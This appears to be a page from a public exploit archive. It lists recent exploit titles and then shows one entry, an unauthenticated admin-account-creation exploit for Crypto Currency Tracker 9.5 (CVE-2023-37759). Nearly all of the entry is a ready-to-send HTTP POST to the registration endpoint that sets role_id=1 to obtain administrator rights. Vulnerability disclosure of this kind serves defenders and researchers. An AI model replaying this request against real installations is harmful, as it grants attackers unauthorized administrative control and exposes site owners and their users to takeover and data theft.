e07f33f24d
17 changes to exploits/shellcodes/ghdb EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) EuroTel ETL3100 - Transmitter Default Credentials EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download Color Prediction Game v1.0 - SQL Injection Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Dolibarr Version 17.0.1 - Stored XSS Global - Multi School Management System Express v1.0- SQL Injection OVOO Movie Portal CMS v3.3.3 - SQL Injection PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Taskhub CRM Tool 2.8.6 - SQL Injection Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions TSPlus 16.0.0.0 - Remote Work Insecure Credential storage TSplus 16.0.0.0 - Remote Work Insecure Files and Folders TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
19 lines
No EOL
924 B
Text
19 lines
No EOL
924 B
Text
# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
|
|
# Date: 11.08.2023
|
|
# Exploit Author: 0xBr
|
|
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
|
|
# Version: <=9.5
|
|
# CVE: CVE-2023-37759
|
|
|
|
POST /en/user/register HTTP/2
|
|
Host: localhost
|
|
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-GB,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 756
|
|
|
|
_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
|
|
|
|
-- Sent with https://mailfence.com Secure and private email |